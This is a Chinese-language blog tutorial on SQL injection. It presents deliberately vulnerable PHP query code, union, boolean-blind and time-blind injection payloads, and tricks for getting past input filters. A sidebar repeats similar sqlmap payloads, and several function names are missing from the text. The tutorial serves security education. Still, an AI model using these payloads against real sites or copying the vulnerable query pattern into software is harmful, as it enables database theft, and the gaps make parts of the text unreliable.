网络漏洞攻击__手把手教白客自学路线

于 2024-05-09 14:58:49 发布
阅读量327 收藏 6
点赞数 3
文章标签: 注入 替换
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68974407/article/details/138614909
版权

网络漏洞攻击__手把手教白客自学路线

前言

本篇博文是《从0到1学习安全测试》中漏洞原理系列的第二篇博文,主要内容是介绍在 SQL 注入过程中如何进行信息搜集,以及实操基础的入门注入和一些常用绕过注入,往期系列文章请访问博主的 安全测试 专栏;

严正声明:本博文所讨论的技术仅用于研究学习,旨在增强读者的信息安全意识,提高信息安全防护技能,严禁用于非法活动。任何个人、团体、组织不得用于非法目的,违法犯罪必将受到法律的严厉制裁。

信息搜集

信息搜集在 SQL 注入攻击中扮演着重要的角色,它为攻击者提供了关键的目标数据库和应用程序信息,帮助攻击者更好地进行后续的攻击操作。

信息搜集主要包括以下几个方面:

识别和了解目标数据库:获取目标数据库的类型、版本、表结构、列名以及其他关键信息。获取敏感信息:获取目标数据库中的敏感信息,如用户名、密码、用户权限、财务信息等。发现漏洞和弱点:发现目标应用程序的漏洞和弱点,如不安全的输入验证、不当的错误处理机制等。判断注入点和注入类型:确定目标应用程序存在的注入点,即用户输入数据直接或间接进入 SQL 语句的位置。同时,了解到目标应用程序的数据库交互方式(如直接构造 SQL 语句、使用存储过程等),从而选择最适合的注入类型和方法。

使用以下一些指令获取相关信息:

():获取数据库版本;

image.png

user():获取数据库用户名;

image.png

():获取数据库名;

image.png

@@:获取数据库路径;

image.png

@@:获取操作系统版本;

image.png

注入入门基础注入

假设一个网站的部分源码如下所示:

$sql = "SELECT * FROM users where name='";
$sql .= $_GET["name"]."'";
$result = mysql_query($sql);
if ($result) {
  while ($row = mysql_fetch_assoc($result))
    echo "";
  echo "".$row['id']."";
  echo "".$row['name']."";
  echo "".$row['age']."";
  echo "";
}
echo "";

那么我们根据其 SQL 语句 * FROM users where name=' 进行正常查询时,可以发现不管有没有这个用户名 name,最终都会显示出结果,运行结果如下:

image.png

那么我们据此构造一些恶意语句,比如说使用 union 进行联合查询,使用 union 需要保证前后查询的字段数量保持一致,否则会报错,运行结果如下所示:

image.png

那么根据上述原理,我们可以匹配出网页源码中 SQL 语句里的 * 代表着 5 个字段,运行结果如下所示:

image.png

我们可以构造 SQL 收集一些信息,比如 admin union (),user(),(),4,5--+,运行结果如下:

image.png

SQL 盲注

SQL 盲注是指在进行网络安全测试或攻击时,攻击者通过检测系统的响应来确定系统中存在的漏洞或薄弱点的一种方法。攻击者通常会发送特定的请求到目标系统,并观察系统的响应,如果响应的结果与预期不符,那么可能存在漏洞。通过不断尝试不同的请求和观察响应,攻击者可以逐步获得关于目标系统的信息,并利用这些信息进行进一步的攻击。

假设一个网站的部分源码如下所示:

$sql = "SELECT * FROM users ORDER BY `";                         
$sql = mysql_real_escape_string($_GET["order"])."`";            
$result = mysql_query($sql);

接下来我们将采用布尔盲注和时间盲注的方式进行攻击。

布尔盲注

布尔盲注是指在进行 SQL 注入时,根据返回的结果是 True 或者是 False 来得到数据库中的相关信息。

由于网站源码是对 order by 进行了拼接,因此我们不能再使用 union 等方法进行注入,而且这里并没有报错输出,因此采用布尔盲注的方式,为了方便调试,接下来将以 BP 抓包的形式展现。

首先是正常的进行请求,运行结果如下:

image.png

接下来使用布尔盲注,因为上个例子已经知道数据库名是 ,因此这里就不做过多猜测,注入语句如下:

order=name` RLIKE (SELECT (CASE WHEN (ORD(MID((IFNULL(CAST(DATABASE() AS NCHAR),0x20)),1,1))>100) THEN 0x6e616d65 ELSE 0x28 END))

解释一下上述的 SQL 语句,这句 SQL 的目的是通过判断数据库名的第一个字符的 ASCII 码值是否大于100(e 是101),来实现一个条件查询的排序。如果第一个字符的 ASCII 码值大于100,则按照字段名 name ()升序排序,否则按照括号字符 ( (0x28)的 ASCII 码值来排序。

同时,这句 SQL 中使用了一些函数和技巧:

运行结果:

image.png

推断数据库名的第二个字符的 SQL 语句如下:

order=name` RLIKE (SELECT (CASE WHEN (ORD(MID((IFNULL(CAST(DATABASE() AS NCHAR),0x20)),2,1))>119) THEN 0x6e616d65 ELSE 0x28 END))

接下来以此类推就可以了。

时间盲注

除了布尔盲注之外,还存在其他的盲注方式,比如时间盲注。

时间盲注是指攻击者向目标应用程序发送恶意的请求时,如果存在时间盲注漏洞,应用程序可能会有不同的响应时间。

正常查询时,所需时间如下:

image.png

构造时间盲注的 SQL 语句:

order=age` and if(ascii(substr(database(),1,1))=101,sleep(1),1)--+

运行结果:

image.png

绕过方式

为了避免 SQL 注入攻击,应用程序会对输入数据进行适当的验证和过滤,而 会绞尽脑汁地想办法去进行绕过,以下是一些常见的绕过方式。

空格被过滤

1、使用 /*xxx*/ 行内注释或者 () 进行绕过:

SELECT/*1*/username,password/*1*/FROM/*1*/users;
SELECT(username),(password)FROM(users);

image.png

2、使用 %09 %0a %0d %a0 等不可见字符进行绕过:

假设一个网站的部分源码如下所示:

if (preg_match('/ /', $_GET["name"])) {
    die("ERROR NO SPACE");
}
$sql = "SELECT * FROM users where name='";
$sql .= $_GET["name"]."'";
$result = mysql_query($sql);

如果是正常注入的话,会发现空格被过滤了,导致注入失败:

image.png

因此,我们需要使用不可见字符替换空格,下面将使用 %a0 进行替换:

image.png

引号被过滤

使用十六进制代替字符串,比如将 的十六进制表示为 :

SELECT username, password FROM users WHERE username=0x736964696f74

image.png

逗号被过滤

1、使用 from for 代替逗号:

# 替换前
select substr(database(),1,1);
# 替换后
select substr(database() from 1 for 1);

image.png

2、使用 join 代替逗号:

# 替换前
select 1,2;
# 替换后
select * from (select 1)a join (select 2)b;

image.png

3、使用 代替逗号:

# 替换前
select * from users limit 0,1;
# 替换后
select * from users limit 1 offset 0;

image.png

比较符号被过滤

1、用 like, rlike, 代替 =:

select * from users where username like 'sidiot';
select * from users where username rlike 'sidiot';
select * from users where username regexp 'sidiot';

image.png

2、用 ()、least() 代替 :

# 替换前
select * from users where id=1 and ascii(substr(database(),0,1))<64;
# 替换后
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64;
select * from users where id=1 and least(ascii(substr(database(),1,1)),64)=64;

image.png

or/and/xor/not 被过滤and = &&or = ||xor = |not = !常用函数被过滤hex()、bin() = ascii()sleep() = ()() = ()mid()、() = ()@@user = user()@@ = ()后记

通过本文的讲解,我们对 SQL 注入漏洞有了更深入的理解。了解了信息搜集在 SQL 注入过程中的重要性,并学习了一些基础的入门注入技巧和常用的绕过注入方法。因此,我们要意识到 SQL 注入对系统安全造成的严重威胁,在设计和开发阶段就采取必要的安全措施,例如使用参数化查询和限制权限访问等,建立更安全的应用程序,并保护数据的安全性。

以上就是SQL 注入漏洞之理论讲解的所有内容了,希望本篇博文对大家有所帮助!

严正声明:本博文所讨论的技术仅用于研究学习,旨在增强读者的信息安全意识,提高信息安全防护技能,严禁用于非法活动。任何个人、团体、组织不得用于非法目的,违法犯罪必将受到法律的严厉制裁。

上篇精讲:「漏洞原理」(一)SQL 注入漏洞之概念介绍

我是,期待你的关注,创作不易,请多多支持;

网络安全学习路线图(思维导图)

网络安全学习路线图可以是一个有助于你规划学习进程的工具。你可以在思维导图上列出不同的主题和技能,然后按照逻辑顺序逐步学习和掌握它们。这可以帮助你更清晰地了解自己的学习进展和下一步计划。

1. 网络安全视频资料

2. 网络安全笔记/面试题

3. 网安电子书PDF资料

如果你向网安入门到进阶的全套资料,我都打包整理好了,需要学习的小伙伴可以V我找我拿~

学网络安全/学黑客,零基础资料整理来啦~~~

~

程序员三九
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全】「漏洞原理」(二)SQL 注入漏洞之理论讲解
顶峰
10-11 1199
严正声明:本博文所讨论的技术仅用于研究学习,旨在增强读者的信息安全意识,提高信息安全防护技能,严禁用于非法活动。任何个人、团体、组织不得用于非法目的,违法犯罪必将受到法律的严厉制裁。
其他CTF题目(记录备忘)
技术学习人生
08-30 3692
1、ISG2014 SQLMAP Misc 100 附件文件下载:http://www.2cto.com/uploadfile/2014/1013/20141013055722355.zip 题目给了一个sqlmap数据包,查看发现是通过逐位猜解的方式获得key,语句类似/message.php?id=1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CH
布尔盲注脚本-sqlilabs-less6
wuerror的博客
02-01 384
写这个起因是用sqlmap跑完,从日志里看它payload想自己复现一下。 不过sqlmap好像并没有识别数据名的长度,而是直接从第一位开始判断。也可能它payload混在了前面识别类型的里面我没注意。判断名的部分payload如下 ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64# ID:1" ...
bugku 日志审计
爱党人士
08-20 1700
不得不说,这是bugku流量分析中挺复杂的一道流量分析题。 下载后是一个txt 不用pcap的原因应该是可能怕我们提取数据太麻烦,写脚本不好写,因此直接给个txt文件。 那么先打开txt文件分析, 这个已经很友善了,网址那里已经sqli_blind提示了, 那么这就是一道sql盲注复现的流量分析。 知识点: sql二分法盲注 一些sql常见语句 分析正常字符出现的条件 写脚本进行数据提取(ps:...
SQL注入补充--不加逗号的SQL注入
weixin_43858799的博客
05-15 820
针对一些题目比较坑,会过滤掉逗号,所以一般的SQL注入都会失效 这里提供一种无逗号的注入方式: 1’ union select * from (select database()) a join (select version() ) b %23 //爆 1’ union select * from (select group_concat(table_name) from informa...
手把手教你配置路由器.zip___手把手教你配置路由器.zip
05-06
总的来说,"手把手教你配置路由器"这份资源可能是一个全面的指南,涵盖路由器的基本设置到高级功能,适合想要深入了解和优化网络环境的读者。通过学习和实践,你可以更好地掌握网络管理技能,提升网络效率和安全性。
手把手教你理解卷积神经网络
02-25
本文于译文,卷积神经网络是一种识别和理解图像的神经网络。本文将从不同的层次来介绍卷积神经网络。本文将继续为你介绍关于卷积神经网络的知识。为了保持文章的简洁性和全面性我将为你提供研究论文的链接,里边会有...
FPGA.rar_TEACH_手把手fpga
09-14
芯创电子手把手教你学习FPGA 共十章The core of the electronic hand to teach you to learn FPGA a total of ten chapters
SQL注入盲注基础
m0_62177883的博客
07-26 1880
如下,就取出了username下的全部数据内容这里,可以在2的位置写上username,3的位置写上password,就可以的到全部数据?指在SQL注入的过程中,找到注入点后,执行SQL语句后,选择的数据或者错误信息不能回显到前端页面。这里需要利用一些方法进行判断或者猜测,这个过程称之为盲注。第八关就用到盲注的方法。因为当输入?id=1时,出现的是只有两种显示,输入正确的语句,就显示youarein......,输入错误的东西,就不显示内容。.....................
sqllab第五关解析
Deeeelete的博客
12-09 1000
查看注入 “1”说明刚好闭合,我们查看字段试试 成功报错了,但是有一个额外情况,那就是当我们查看字段3的时候它是这么一个情况,注意这里用的是1而不再是-1了,因为它压根儿就没返回任何username和password,只有个句子。 这说明我们遇到了无比令人厌烦的布尔注入 2.屏幕不提示内容,我们知道的只有一个信息,那就是,当我们构造的语句正确的时候,它必然返回you are in,所以...
SQL注入布尔盲注
qq_43936524的博客
02-16 666
记录一下日常发现的SQL注入漏洞,方便以后拓宽思路。 漏洞发现 漏洞的位置在某公司的解决方案模块页面,注入的参数为type,请求方式为get 经过测试发现当type的值为1或者有效数值时页面会正常显示,当数值为type=1 and 1=9时页面出现错误 可推断出and 1 = 9被执行,此次存在SQL布尔盲注漏洞 打开sqlmap选择注入方式为布尔盲注,跑出当前的数据名 python sqlmap.py -u https://xxx/xx.php?type=1 -v 3 --technique=B --
关于SQL注入,绕过逗号过滤
weixin_43247256的博客
01-27 6948
CTF sql注入题目。
Sqlmap入侵日志审计
weixin_50464560的博客
09-15 518
转载至https://blog.csdn.net/qq_45521281/article/details/105876242 例题1.——bugku日志审计 本题要点:sql盲注、python脚本编写、python正则表达式 先下载压缩包,解压发现里面是一个 access.log 日志文件。 全选后在网上URL解码: 复制回notepad++中 这样看起来就方便多了。(或者全选,插件—>MIME Tools—>URL Decode) 接下来开始分析。 1.测试有没有注入漏洞 这理就
sqlmap payload简单分析(B E T U S)
lhm的博客
03-14 1440
开始啦 sqlmap payload简单分析(B E T U S) 标签: sqlmap 2016-05-19 14:55 3357人阅读 评论(0) 收藏 举报 分类: SQL Injection(4) 版权声明:本文为博主原创文章,未经博主允许不得转载。 目录(?)[+] sqlmap pay
sql语句的join用法
热门推荐
猫叔的口粮
12-10 2万+
sql的join分为三种,内连接、外连接、交叉连接。 以下先建2张表,插入一些数据,后续理解起来更方便一些。 create table emp(empno int, name char(20),depart int); create table depart(dpno int,dpname char(20)); insert into emp values (1,'bell',1); i
python将提取的数据导出_独家 | 手把手教你如何用Python从PDF文件中导出数据
最新发布
05-24
好的,以下是用Python从PDF文件中导出数据的步骤: 1. 安装必要的Python 你需要安装以下的Python:PyPDF2、pandas、numpy。可以通过以下命令来安装: ``` pip install PyPDF2 pandas numpy ``` 2. 打开PDF文件并读取数据 使用PyPDF2打开PDF文件,并读取需要的数据。这里以读取PDF文件中的表格数据为例。 ```python import PyPDF2 # 打开PDF文件 pdf_file = open('example.pdf', 'rb') pdf_reader = PyPDF2.PdfFileReader(pdf_file) # 读取第一页 page = pdf_reader.getPage(0) table = "" # 读取表格数据 try: table = page.extractText() except: pass pdf_file.close() ``` 3. 将数据转换为DataFrame 使用pandas将读取的表格数据转换为DataFrame。 ```python import pandas as pd import numpy as np # 将表格数据转换为DataFrame data = table.split("\n") data = [i.split("\t") for i in data] df = pd.DataFrame(data) # 删除空行和空列 df = df.dropna(how="all") df = df.dropna(axis=1, how="all") # 重置索引 df = df.reset_index(drop=True) ``` 4. 将数据导出为CSV文件 最后,使用pandas将DataFrame中的数据导出为CSV文件。 ```python # 将数据导出为CSV文件 df.to_csv("example.csv", index=False, encoding='utf-8-sig') ``` 以上就是用Python从PDF文件中导出数据的完整步骤。希望对你有所帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值